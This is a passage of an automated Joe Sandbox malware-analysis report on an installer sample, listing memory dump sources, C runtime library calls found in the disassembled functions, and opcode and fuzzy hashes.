                    • Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd
                    Similarity
                    • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                    • String ID: KERNEL32.DLL
                    • API String ID: 637971194-2576044830
                    • Opcode ID: d04969183b3ab938893ce3c42fedb9c83615c45d3c3557647b502cd2a3e65207
                    • Instruction ID: 9c79eda824f7417b38aaa2091c3a02152ca150d1bd66eb13543c1e3a5cfdcf53
                    • Opcode Fuzzy Hash: d04969183b3ab938893ce3c42fedb9c83615c45d3c3557647b502cd2a3e65207
                    • Instruction Fuzzy Hash: C201C471400B459FDB229F66C845759FBF0AF40324F10460EE5DA9A2E1CBB4A544CF15
                    APIs
                    • __CreateFrameInfo.LIBCMT ref: 003E79BB
                      • Part of subcall function 003E4842: __getptd.LIBCMT ref: 003E4850
                      • Part of subcall function 003E4842: __getptd.LIBCMT ref: 003E485E
                    • __getptd.LIBCMT ref: 003E79C5
                      • Part of subcall function 003E979C: __getptd_noexit.LIBCMT ref: 003E979F
                      • Part of subcall function 003E979C: __amsg_exit.LIBCMT ref: 003E97AC
                    • __getptd.LIBCMT ref: 003E79D3
                    • __getptd.LIBCMT ref: 003E79E1
                    • __getptd.LIBCMT ref: 003E79EC
                    • _CallCatchBlock2.LIBCMT ref: 003E7A12
                      • Part of subcall function 003E48E7: __CallSettingFrame@12.LIBCMT ref: 003E4933
                      • Part of subcall function 003E7AB9: __getptd.LIBCMT ref: 003E7AC8
                      • Part of subcall function 003E7AB9: __getptd.LIBCMT ref: 003E7AD6
                    Memory Dump Source
                    • Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd
                    Similarity
                    • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                    • String ID:
                    • API String ID: 1602911419-0
                    • Opcode ID: 8852c955d825c35b92bf28dc4c0caeb336459275d55f8f177b5989e78b8a6c82
                    • Instruction ID: 816b3272513b5c926608d193269ba4a88165e3e957b2342375fc700331a630b6
                    • Opcode Fuzzy Hash: 8852c955d825c35b92bf28dc4c0caeb336459275d55f8f177b5989e78b8a6c82
                    • Instruction Fuzzy Hash: 441126B1C00259DFDF01EFA5C445BADBBB0FF08310F11856AF814AB392DB389A149B50
                    APIs
                    • __getptd.LIBCMT ref: 003ED1C0
                      • Part of subcall function 003E979C: __getptd_noexit.LIBCMT ref: 003E979F
                      • Part of subcall function 003E979C: __amsg_exit.LIBCMT ref: 003E97AC
                    • __amsg_exit.LIBCMT ref: 003ED1E0
                    • __lock.LIBCMT ref: 003ED1F0
                    • InterlockedDecrement.KERNEL32(?), ref: 003ED20D
                    • _free.LIBCMT ref: 003ED220
                    • InterlockedIncrement.KERNEL32(00D61670), ref: 003ED238
                    Memory Dump Source
                    • Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd
                    Similarity
                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                    • String ID:
                    • API String ID: 3470314060-0
                    • Opcode ID: 1cb11157ea04c8544797a355939a741e02ba5087a32e205fbe9c667fb7e6d72d
                    • Instruction ID: 3e743d6e05d2de83327010d44b32f21fd490554ef8ad983ad562c3990aaecff5
                    • Opcode Fuzzy Hash: 1cb11157ea04c8544797a355939a741e02ba5087a32e205fbe9c667fb7e6d72d
                    • Instruction Fuzzy Hash: 1401C032D016B59BCB23AF269805BADB364BF04761F060225FD00AB7D1CB34AA41CBD5
                    APIs
                    • __EH_prolog.LIBCMT ref: 003E1AF0
                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 003E1B04
                      • Part of subcall function 003E32DA: _setlocale.LIBCMT ref: 003E32EC
                    • _free.LIBCMT ref: 003E1B12
                      • Part of subcall function 003E4452: HeapFree.KERNEL32(00000000,00000000,?,003E3C60,?,?,003E101C), ref: 003E4468
                      • Part of subcall function 003E4452: GetLastError.KERNEL32(?,?,003E3C60,?,?,003E101C), ref: 003E447A
                    • _free.LIBCMT ref: 003E1B24
                    • _free.LIBCMT ref: 003E1B36
                    • _free.LIBCMT ref: 003E1B48
                    Memory Dump Source
                    • Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd
                    Similarity
                    • API ID: _free$ErrorFreeH_prologHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
                    • String ID:
                    • API String ID: 770894815-0
                    • Opcode ID: 69f4445d097f98401d12acd51b8569898e6d1dd4d120742049a729f846a4dfca
                    • Instruction ID: b2aff022ea3215435421a23c1dfd081016e10aa98abc710c952bb5980af44d68
                    • Opcode Fuzzy Hash: 69f4445d097f98401d12acd51b8569898e6d1dd4d120742049a729f846a4dfca
                    • Instruction Fuzzy Hash: 320152317007619BDB25ABAAD406B5BB3E8FF04725F00861EE056DB5C1DF7CE5048E60
                    APIs
                    • __CxxThrowException@8.LIBCMT ref: 003E155A
                    • std::exception::exception.LIBCMT ref: 003E157C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd
                    Similarity
                    • API ID: Exception@8Throwstd::exception::exception
                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                    • API String ID: 3728558374-1866435925
                    • Opcode ID: df8b3bdffc70d1e89fef81baa3403ff015637f6b224beb766178d500c18cbf3a
                    • Instruction ID: 265e1df77062be7ac869ec538560b5c665653160e34bf74bb6dae234ddef13f9
                    • Opcode Fuzzy Hash: df8b3bdffc70d1e89fef81baa3403ff015637f6b224beb766178d500c18cbf3a
                    • Instruction Fuzzy Hash: 440192B180026CBACB07EFAB84067ED77E85B82714B148216E5179B2C2D674CA058F51
                    APIs
                    • ___BuildCatchObject.LIBCMT ref: 003E7D53
                      • Part of subcall function 003E7CAE: ___BuildCatchObjectHelper.LIBCMT ref: 003E7CE4
                    • _UnwindNestedFrames.LIBCMT ref: 003E7D6A
                    • ___FrameUnwindToState.LIBCMT ref: 003E7D78
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd
                    Similarity
                    • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                    • String ID: csm$csm
                    • API String ID: 2163707966-3733052814
                    • Opcode ID: 6c894a3f2729321d8e37f772740de334ea6d335cc87a979b471e5224e4f7bb87
                    • Instruction ID: 8cf2768a95678ff5116fce6ab109e3d6b291c8eac65fb783929cd3afca15ca39
                    • Opcode Fuzzy Hash: 6c894a3f2729321d8e37f772740de334ea6d335cc87a979b471e5224e4f7bb87
                    • Instruction Fuzzy Hash: FC01E4310051A9BBDF23AF52CC45EAB7F6AEF08350F104214BD19192A1D73299A1DBA1
                    APIs
                    • _malloc.LIBCMT ref: 003EDE06
                      • Part of subcall function 003E729E: __FF_MSGBANNER.LIBCMT ref: 003E72B7
                      • Part of subcall function 003E729E: __NMSG_WRITE.LIBCMT ref: 003E72BE
                      • Part of subcall function 003E729E: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,003E63C9,00000000,00000001,00000000,?,003EB6D2,00000018,003FD718,0000000C,003EB762), ref: 003E72E3
                    • _free.LIBCMT ref: 003EDE19
                    Memory Dump Source
                    • Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd
                    Similarity
                    • API ID: AllocateHeap_free_malloc
                    • String ID:
                    • API String ID: 1020059152-0
                    • Opcode ID: 81498024c0fe2090d591e1a89aaaf62592e241205547c758075cf785bcacabe9
                    • Instruction ID: 01d65415e9d98dfb1a31fb29c1c35ffb2a9c51b19b79a0934e5a06ca9cee946c
                    • Opcode Fuzzy Hash: 81498024c0fe2090d591e1a89aaaf62592e241205547c758075cf785bcacabe9
                    • Instruction Fuzzy Hash: 34119832804975EACB233B76AC0C76A3B599BA4360F258726F4559F1D0DE309841D655
                    APIs
                    • __getptd.LIBCMT ref: 003ED941
                      • Part of subcall function 003E979C: __getptd_noexit.LIBCMT ref: 003E979F
                      • Part of subcall function 003E979C: __amsg_exit.LIBCMT ref: 003E97AC
                    • __getptd.LIBCMT ref: 003ED958
                    • __amsg_exit.LIBCMT ref: 003ED966
                    • __lock.LIBCMT ref: 003ED976
                    • __updatetlocinfoEx_nolock.LIBCMT ref: 003ED98A
                    Memory Dump Source
                    • Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd
                    Similarity
                    • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                    • String ID:
                    • API String ID: 938513278-0
                    • Opcode ID: 0c7e082d61dea8e8cacbe9456960bfd1be089fc65024c4245be223c75a27434b
                    • Instruction ID: 7b675ec875f7f80aeca69b948d92cbeb63d8dd53949634670dd56bd7cbcecc93
                    • Opcode Fuzzy Hash: 0c7e082d61dea8e8cacbe9456960bfd1be089fc65024c4245be223c75a27434b
                    • Instruction Fuzzy Hash: B1F0B4329407B49FDB23BB6A9C0775E77A0AF00720F124319F554AF2C3CB3459009B56
                    Memory Dump Source
                    • Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b664f11c2f32082ffa33ec34508f7bee827204ba96a4beb225e4ce11275e3197
                    • Instruction ID: 0e8881ecdfce5960f018cff0837e5c9bbffb1f82536f7d6dffbffe0ff07c0866
                    • Opcode Fuzzy Hash: b664f11c2f32082ffa33ec34508f7bee827204ba96a4beb225e4ce11275e3197
                    • Instruction Fuzzy Hash: 9E519F759006A99FCF16DFA9C9818AEB7FDFF08314B20066EE142A7691D770AE44CB10
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd
                    Similarity
                    • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                    • String ID:
                    • API String ID: 2782032738-0
                    • Opcode ID: c58174079ed187f757af3dbd0f50497141cf6e9fe6a182bf34fc82d736e20487
                    • Instruction ID: f304351dbbc9d6a1583bc1368d86843c5b6e4d9becffee03faae4da06665f487
                    • Opcode Fuzzy Hash: c58174079ed187f757af3dbd0f50497141cf6e9fe6a182bf34fc82d736e20487
                    • Instruction Fuzzy Hash: E841E531A00FA4DFDB269F6788446AEBBB6AF81328F258728E456975C0D770ED418B40
                    APIs
                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 003F3C19
                    • __isleadbyte_l.LIBCMT ref: 003F3C4C
                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00001000,?,00000000,00000000,?,?,?), ref: 003F3C7D
                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00001000,00000001,00000000,00000000,?,?,?), ref: 003F3CEB
                    Memory Dump Source
                    • Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd
                    Similarity
                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                    • String ID:
                    • API String ID: 3058430110-0
                    • Opcode ID: 5e40312b848d2c960f316e409e44db522bf687c02bb69e432bbfc546be374c50
                    • Instruction ID: 7fb5388e457e50f503b205b1db5b143668d7424d45c8cd7af4937c9086fd8b8d
                    • Opcode Fuzzy Hash: 5e40312b848d2c960f316e409e44db522bf687c02bb69e432bbfc546be374c50
                    • Instruction Fuzzy Hash: C331E531A0429EEFCB12DF64C884AB97BB5FF01310F168569E261EB1A1D730DE40DB51
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd
                    Similarity
                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                    • String ID:
                    • API String ID: 3016257755-0
                    • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                    • Instruction ID: 16426bb2877b556cd2477befc53ce76b1b545b86f8e3dda862f239c3a7b6c417
                    • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                    • Instruction Fuzzy Hash: 80117E7640029ABBCF235F86CC05DEE3F26BB18390B598656FA1859071D736C9B1AB81
                    APIs
                    • _malloc.LIBCMT ref: 003E44A6
                      • Part of subcall function 003E729E: __FF_MSGBANNER.LIBCMT ref: 003E72B7
                      • Part of subcall function 003E729E: __NMSG_WRITE.LIBCMT ref: 003E72BE
                      • Part of subcall function 003E729E: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,003E63C9,00000000,00000001,00000000,?,003EB6D2,00000018,003FD718,0000000C,003EB762), ref: 003E72E3
                    • std::exception::exception.LIBCMT ref: 003E44DB
                    • std::exception::exception.LIBCMT ref: 003E44F5
                    • __CxxThrowException@8.LIBCMT ref: 003E4506
                    Memory Dump Source
                    • Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd
                    Similarity
                    • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                    • String ID:
                    • API String ID: 615853336-0
                    • Opcode ID: 16842479139ee23ba6c2965f71b4b96c13108fe1459423af283d3db26ef8252c
                    • Instruction ID: 3ad08dedd921cc779c90a6e46f121c2ef0fd1ead74360894ce1526b2be8ec4a0
                    • Opcode Fuzzy Hash: 16842479139ee23ba6c2965f71b4b96c13108fe1459423af283d3db26ef8252c
                    • Instruction Fuzzy Hash: 7EF0497160026A6ADB07EB57DD06BAD37A9AB45314F100225F904BA1D2CF709A408B40
                    APIs
                    • std::_Xinvalid_argument.LIBCPMT ref: 003E35CA
                      • Part of subcall function 003E38AC: std::exception::exception.LIBCMT ref: 003E38C1
                      • Part of subcall function 003E38AC: __CxxThrowException@8.LIBCMT ref: 003E38D6
                      • Part of subcall function 003E38AC: std::exception::exception.LIBCMT ref: 003E38E7
                      • Part of subcall function 003E225E: std::_Xinvalid_argument.LIBCPMT ref: 003E226F
                    • _memmove.LIBCMT ref: 003E3625
                    Strings
                    • invalid string position, xrefs: 003E35C5
                    Memory Dump Source
                    • Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd
                    Similarity
                    • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
                    • String ID: invalid string position
                    • API String ID: 3404309857-1799206989
                    • Opcode ID: 76a79e7dcdcb6c67aaa48ce239ab34185813bf863195f74a807f9d0d05ca2332
                    • Instruction ID: a1bcbf820e128e8ed1c19e7a31e50d23ed99ad60f0c50a46f5ba1fc4a29f9a59
                    • Opcode Fuzzy Hash: 76a79e7dcdcb6c67aaa48ce239ab34185813bf863195f74a807f9d0d05ca2332
                    • Instruction Fuzzy Hash: 7211AB313042B4EBDB2A9E2BCC85A66B3A9EB85710F100B1DF9568B3C1D7B1DF018795
                    APIs
                    • std::_Xinvalid_argument.LIBCPMT ref: 003E2156
                      • Part of subcall function 003E38AC: std::exception::exception.LIBCMT ref: 003E38C1
                      • Part of subcall function 003E38AC: __CxxThrowException@8.LIBCMT ref: 003E38D6
                      • Part of subcall function 003E38AC: std::exception::exception.LIBCMT ref: 003E38E7
                    • _memmove.LIBCMT ref: 003E218F
                    Strings
                    • invalid string position, xrefs: 003E2151
                    Memory Dump Source
                    • Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd
                    Similarity
                    • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                    • String ID: invalid string position
                    • API String ID: 1785806476-1799206989
                    • Opcode ID: bc58543f82b736532caebfbde76899cf9395f4fb3ae87d3babd8162dbce4cec3
                    • Instruction ID: 8fadd307762f67a5b48d02d302d0c7f42bc93424b059eedb1e1b45322908fe83
                    • Opcode Fuzzy Hash: bc58543f82b736532caebfbde76899cf9395f4fb3ae87d3babd8162dbce4cec3
                    • Instruction Fuzzy Hash: 2B01B5313102A19BD7268E69DCC486BB3BEEBC57107204B3DE6818B785DB74EE4583A4
                    APIs
                    • _strcpy_s.LIBCMT ref: 003E67F4
                    • __invoke_watson.LIBCMT ref: 003E6848
                      • Part of subcall function 003E6683: _strcat_s.LIBCMT ref: 003E66A2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd
                    Similarity
                    • API ID: __invoke_watson_strcat_s_strcpy_s
                    • String ID: &k>
                    • API String ID: 312943863-2229881991
                    • Opcode ID: e0e9071177e5dacf167cf5c7613768fb8065f4ca94015d21ba007a7314cc8a96
                    • Instruction ID: ebda3a118a1a944a8c54f72002593fed1edb24d4800bd71b285aac12daa78933
                    • Opcode Fuzzy Hash: e0e9071177e5dacf167cf5c7613768fb8065f4ca94015d21ba007a7314cc8a96
                    • Instruction Fuzzy Hash: E2F0F6724003A87BDF136FA2CC07EEA3F5DAF20390F498021FA195A0A2E7329D10C790
                    APIs
                      • Part of subcall function 003E4895: __getptd.LIBCMT ref: 003E489B
                      • Part of subcall function 003E4895: __getptd.LIBCMT ref: 003E48AB
                    • __getptd.LIBCMT ref: 003E7AC8
                      • Part of subcall function 003E979C: __getptd_noexit.LIBCMT ref: 003E979F
                      • Part of subcall function 003E979C: __amsg_exit.LIBCMT ref: 003E97AC
                    • __getptd.LIBCMT ref: 003E7AD6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd
                    Similarity
                    • API ID: __getptd$__amsg_exit__getptd_noexit
                    • String ID: csm
                    • API String ID: 803148776-1018135373
                    • Opcode ID: 9be489d9b2c9357c481f46e0d1185517e740e94918750dde5ba21505126bd088
                    • Instruction ID: 2eb6379593c76bdeb124238add9d2d20c4e8da45de7750226ff7c93dc00e51d2
                    • Opcode Fuzzy Hash: 9be489d9b2c9357c481f46e0d1185517e740e94918750dde5ba21505126bd088
                    • Instruction Fuzzy Hash: D10162398052E7CBCF369F23D44866DB3B5EF14311F254A6EE0459A6E1DB318984CB41